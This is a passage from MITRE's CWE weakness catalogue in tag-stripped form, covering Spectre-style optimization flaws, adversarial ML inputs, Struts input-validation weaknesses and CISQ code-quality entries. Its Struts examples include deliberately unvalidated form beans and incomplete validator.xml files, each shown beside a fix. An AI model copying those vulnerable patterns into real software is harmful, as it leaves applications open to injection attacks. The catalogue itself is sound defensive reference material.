2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Background_Details, Description - - - - - The developer builds a security-critical protection mechanism into the software, but the processor optimizes the execution of the program such that the mechanism is removed or modified. - - - - - - Primary - This weakness does not depend on other weaknesses and is the result of choices made by the processor in executing the specified application. - - - - - - - - Architecture and Design - Optimizations built into the design of the processor can have unintended consequences during the execution of an application. - - - Low - - - Integrity - Bypass Protection Mechanism - High - A successful exploitation of this weakness will change the order of an application's execution and will likely be used to bypass specific protection mechanisms. This bypass can be exploited further to potentially read data that should otherwise be unaccessible. - - - - - White Box - In theory this weakness can be detected through the use of white box testing techniques where specifically crafted test cases are used in conjunction with debuggers to verify the order of statements being executed. - Opportunistic - Although the mentioned detection method is theoretically possible, the use of speculative execution is a preferred way of increasing processor performance. The reality is that a large number of statements are executed out of order, and determining if any of them break an access control property would be extremely opportunistic. - - - - - CVE-2017-5715 - Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as "Spectre". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715 - - - CVE-2017-5753 - Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as "Spectre". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753 - - - CVE-2017-5754 - Intel processor optimizations related to speculative execution cause access control checks to be bypassed when placing data into the cache. Often known as "Meltdown". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754 - - - - - - - - - - - - CWE Content Team - MITRE - 2018-03-07 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Related_Attack_Patterns - - - - - The product uses a mechanism that automatically optimizes code, e.g. to improve a characteristic such as performance, but the optimizations can have an unintended side effect that might violate an intended security assumption. - - - - - - - Primary - This weakness does not depend on other weaknesses and is the result of choices made during optimization. - - - - - - - - Architecture and Design - Optimizations built into the design of a product can have unintended consequences during execution. - - - Low - - - Integrity - Alter Execution Logic - The optimizations alter the order of execution resulting in side effects that were not intended by the original developer. - - - - - CWE Content Team - MITRE - 2018-03-07 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product uses an automated mechanism such as machine learning to recognize complex data inputs (e.g. image or audio) as a particular concept or category, but it does not properly detect or handle inputs that have been modified or constructed in a way that causes the mechanism to detect a different, incorrect concept. - - When techniques such as machine learning are used to automatically classify input streams, and those classifications are used for security-critical decisions, then any mistake in classification can introduce a vulnerability that allows attackers to cause the product to make the wrong security decision. If the automated mechanism is not developed or "trained" with enough input data, then attackers may be able to craft malicious input that intentionally triggers the incorrect classification. - Targeted technologies include, but are not necessarily limited to: - - automated speech recognition - automated image recognition - - For example, an attacker might modify road signs or road surface markings to trick autonomous vehicles into misreading the sign/marking and performing a dangerous action. - - - - - - - - Primary - This weakness does not depend on other weaknesses and is the result of choices made during optimization. - - - - - - - - Architecture and Design - This issue can be introduced into the automated algorithm itself. - - - - - Integrity - Bypass Protection Mechanism - When the automated recognition is used in a protection mechanism, an attacker may be able to craft inputs that are misinterpreted in a way that grants excess privileges. - - - - - - - - - - - Further investigation is needed to determine if better relationships exist or if additional organizational entries need to be created. For example, this issue might be better related to "recognition of input as an incorrect type," which might place it as a sibling of CWE-704 (incorrect type conversion). - - - - CWE Content Team - MITRE - 2018-03-12 - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation. - - - - - - - Primary - - - - - - - In order to use the Struts Validator, a form must extend one of the following: ValidatorForm, ValidatorActionForm, DynaValidatorActionForm, and DynaValidatorForm. One of these classes must be extended because the Struts Validator ties in to the application by implementing the validate() method in these classes. Forms derived from the ActionForm and DynaActionForm classes cannot use the Struts Validator. - - - - Implementation - - - - - Other - Other - Bypassing the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is an important component of vulnerabilities like cross-site scripting, process control, and SQL injection. - - - Confidentiality - Integrity - Availability - Other - Other - Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. - - - - - Implementation - Ensure that all forms extend one of the Validation Classes. - - - - - In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user information from a registration webpage for an online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data. - - public class RegistrationForm extends org.apache.struts.action.ActionForm { - - // private variables for registration formprivate String name;private String email;... - public RegistrationForm() {super();} - // getter and setter methods for private variables... - } - - However, the RegistrationForm class extends the Struts ActionForm class which does not allow the RegistrationForm class to use the Struts validator capabilities. When using the Struts framework to maintain user data in an ActionForm Bean, the class should always extend one of the validator classes, ValidatorForm, ValidatorActionForm, DynaValidatorForm or DynaValidatorActionForm. These validator classes provide default validation and the validate method for custom validation for the Bean object to use for validating input data. The following Java example shows the RegistrationForm class extending the ValidatorForm class and implementing the validate method for validating input data. - - public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { - - // private variables for registration formprivate String name;private String email;... - public RegistrationForm() {super();} - public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...} - // getter and setter methods for private variables... - } - - Note that the ValidatorForm class itself extends the ActionForm class within the Struts framework API. - - - - - Struts: Form Bean Does Not Extend Validation Class - - - SFP24 - Tainted input to command - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Background_Details, Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Background_Details - - - - - The software has multiple functions, methods, procedures, macros, etc. that - contain the same code. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. For example, if there are two copies of the same code, the programmer might fix a weakness in one copy while forgetting to fix the same weakness in another copy. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-19 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The code contains a member element that is declared as static (but not final), in which - its parent class element - is not a singleton class - that is, a class element that can be used only once in - the 'to' association of a Create action. - This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-3 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software uses a data element that has an excessively large - number of sub-elements with non-primitive data types such as structures or aggregated objects. - This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - While the interpretation of "excessively large" may vary for each product or developer, CISQ recommends a default of 5 sub-elements. - - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-12 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software's architecture contains too many - or too few - - horizontal layers. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - While the interpretation of "expected range" may vary for each product or developer, CISQ recommends a default minimum of 4 layers and maximum of 8 layers. - - - - - - Indirect - - - - - Architecture and Design - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-9 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - - - A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor. - This issue can prevent the software from running reliably, since the child might not perform essential destruction operations. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability, such as a memory leak (CWE-401). - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-17 - - - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software creates an immutable text string using string concatenation operations. - When building a string via a looping feature (e.g., a FOR or WHILE loop), the use of += to append to the existing string will result in the creation of a new object with each iteration. This programming pattern can be inefficient in comparison with use of text buffer data elements. This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this could be influenced to create performance problem. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-2 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies. - As an example, with Java, this weakness might indicate cycles between packages. -This issue makes it more difficult to maintain the software due to insufficient modularity, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. -This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCMM-MNT-7 - - - ASCRM-RLB-13 - - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The code contains callable control elements that - contain an excessively large number of references to other - application objects external to the context of the callable, - i.e. a Fan-Out value that is excessively large. - While the interpretation of "excessively large Fan-Out value" may vary for each product or developer, CISQ recommends a default of 5 referenced objects. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-4 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software performs a data query with a large number of joins - and sub-queries on a large data table. - This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - While the interpretation of "large data table" and "large number of joins or sub-queries" may vary for each product or developer, CISQ recommends a default of 1 million rows for a "large" data table, a default minimum of 5 joins, and a default minimum of 3 sub-queries. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-4 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The application has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation. - Omitting validation for even a single input field may give attackers the leeway they need to compromise the application. Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. - - - - - - - Primary - - - - - - - - Implementation - Some applications use the same ActionForm for more than one purpose. In situations like this, some fields may go unused under some action mappings. - - - - - Integrity - Unexpected State - - - Integrity - Bypass Protection Mechanism - If unused fields are not validated, shared business logic in an action may allow attackers to bypass the validation checks that are performed for other uses of the form. - - - - - Implementation - Validate all form fields. If a field is unused, it is still important to constrain it so that it is empty or undefined. - - - - - In the following example the Java class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml. - - public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { - - // private variables for registration form - private String name;private String address;private String city;private String state;private String zipcode;private String phone;private String email; - public RegistrationForm() {super();} - - // getter and setter methods for private variables - ... - } - - The validator XML file, validator.xml, provides the validation for the form fields of the RegistrationForm. - - <form-validation><formset><form name="RegistrationForm"><field property="name" depends="required"><arg position="0" key="prompt.name"/></field><field property="address" depends="required"><arg position="0" key="prompt.address"/></field><field property="city" depends="required"><arg position="0" key="prompt.city"/></field><field property="state" depends="required,mask"><arg position="0" key="prompt.state"/><var><var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value></var></field><field property="zipcode" depends="required,mask"><arg position="0" key="prompt.zipcode"/><var><var-name>mask</var-name><var-value>\d{5}</var-value></var></field></form></formset></form-validation> - - However, in the previous example the validator XML file, validator.xml, does not provide validators for all of the form fields in the RegistrationForm. Validator forms are only provided for the first five of the seven form fields. The validator XML file should contain validator forms for all of the form fields for a Struts ActionForm bean. The following validator.xml file for the RegistrationForm class contains validator forms for all of the form fields. - - <form-validation><formset><form name="RegistrationForm"><field property="name" depends="required"><arg position="0" key="prompt.name"/></field><field property="address" depends="required"><arg position="0" key="prompt.address"/></field><field property="city" depends="required"><arg position="0" key="prompt.city"/></field><field property="state" depends="required,mask"><arg position="0" key="prompt.state"/><var><var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value></var></field><field property="zipcode" depends="required,mask"><arg position="0" key="prompt.zipcode"/><var><var-name>mask</var-name><var-value>\d{5}</var-value></var></field><field property="phone" depends="required,mask"><arg position="0" key="prompt.phone"/><var><var-name>mask</var-name><var-value>^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$</var-value></var></field><field property="email" depends="required,email"><arg position="0" key="prompt.email"/></field></form></formset></form-validation> - - - - - - Struts: Form Field Without Validator - - - SFP24 - Tainted input to command - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Common_Consequences, Description, Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Potential_Mitigations - - - - - The software has a loop body or loop condition that contains a control element that directly or - indirectly consumes platform resources, e.g. messaging, sessions, locks, or file - descriptors. - This issue can make the software perform more slowly. If an attacker can influence the number of iterations in the loop, then this performance problem might allow a denial of service by consuming more platform resources than intended. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-8 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software initializes data using hard-coded values that act as network resource identifiers. - This issue can prevent the software from running reliably, e.g. if it runs in an environment does not use the hard-coded network resource identifiers. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-18 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software initializes a data element using a hard-coded - literal that is not a simple integer or static constant element. - This issue makes it more difficult to modify or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-3 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The product does not have documentation that represents how it is designed. - This issue can make it more difficult to understand and maintain the product. It can make it more difficult and time-consuming to detect and/or fix vulnerabilities. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - - - The code at one architectural layer invokes code that resides - at a deeper layer than the adjacent layer, i.e., the invocation skips at least one - layer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer. - This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-12 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software contains a class with inheritance from more than - one concrete class. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-2 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - A named-callable or method control element has a signature that - supports a variable (variadic) number of parameters or arguments. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - With variadic arguments, it can be difficult or inefficient for manual analysis to be certain of which function/method is being invoked. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-8 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager. - This issue can make the software perform more slowly than intended, since the intended central data manager may have been explicitly optimized for performance or other quality characteristics. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-11 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The code contains a function or method that - operates in a multi-threaded environment but owns an unsafe non-final - static storable or member data element. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-11 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The documentation, whether on paper or in electronic form, does - not contain descriptions of all the relevant elements of the product, such as - its usage, structure, interfaces, design, implementation, configuration, - operation, etc. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation. - - Unchecked input is the leading cause of vulnerabilities in J2EE applications. Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others. - Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. - - - - - - - - Primary - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Architecture and Design - Input Validation - Use an input validation framework such as Struts. - - - Architecture and Design - Libraries or Frameworks - Use an input validation framework such as Struts. - - - Implementation - Input Validation - - Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that: - - - Phone number fields contain only valid characters in phone numbers - Boolean values are only "T" or "F" - Free-form strings are of a reasonable length and composition - - - - - - Implementation - Libraries or Frameworks - - Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that: - - - Phone number fields contain only valid characters in phone numbers - Boolean values are only "T" or "F" - Free-form strings are of a reasonable length and composition - - - - - - - - In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data. - - public class RegistrationForm extends org.apache.struts.action.ActionForm { - - // private variables for registration form - private String name;private String email;... - public RegistrationForm() {super();} - - // getter and setter methods for private variables - ... - } - - However, the RegistrationForm class extends the Struts ActionForm class which does use the Struts validator plug-in to provide validator capabilities. In the following example, the RegistrationForm Java class extends the ValidatorForm and Struts configuration XML file, struts-config.xml, instructs the application to use the Struts validator plug-in. - - public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { - - // private variables for registration form - private String name;private String email;... - public RegistrationForm() {super();} - public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...} - - // getter and setter methods for private variables - ... - } - - The plug-in tag of the Struts configuration XML file includes the name of the validator plug-in to be used and includes a set-property tag to instruct the application to use the file, validator-rules.xml, for default validation rules and the file, validation.XML, for custom validation. - - <struts-config> - <form-beans><form-bean name="RegistrationForm" type="RegistrationForm"/></form-beans> - ... - <!-- ========================= Validator plugin ================================= --><plug-in className="org.apache.struts.validator.ValidatorPlugIn"><set-propertyproperty="pathnames"value="/WEB-INF/validator-rules.xml,/WEB-INF/validation.xml"/> - </plug-in> - </struts-config> - - - - - - Struts: Plug-in Framework Not In Use - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Potential_Mitigations - - - - - The software performs too many data queries without using efficient data processing functionality such as stored procedures. - This issue can make the software perform more slowly due to computational expense. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - While the interpretation of "too many data queries" may vary for each product or developer, CISQ recommends a default maximum of 5 data queries for an inefficient function/procedure. - - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-9 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software does not sufficiently hide the internal representation and implementation details of data or methods, which might allow external components or modules to modify data unexpectedly, invoke unexpected functionality, or introduce dependencies that the programmer did not intend. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code has a parent class that contains references to a child class, its methods, or its members. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-14 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - A static code block creates an instance of a class. - This pattern identifies situations where a storable data element or member data element is initialized with a value in a block of code which is declared as static. -This issue can make the software perform more slowly by performing initialization before it is needed. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-1 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software contains a function, subroutine, or method whose signature has an unnecessarily large number of - parameters/arguments. - This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - While the interpretation of "large number of parameters." may vary for each product or developer, CISQ recommends a default maximum of 7 parameters/arguments. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-13 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The application uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-5 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - - - The software contains a serializable data element that does not - have an associated serialization method. - This issue can prevent the software from running reliably, e.g. by triggering an exception. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-2 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software contains a data query against an SQL table or view - that is configured in a way that does not utilize an index and may cause - sequential searches to be performed. - This issue can make the software 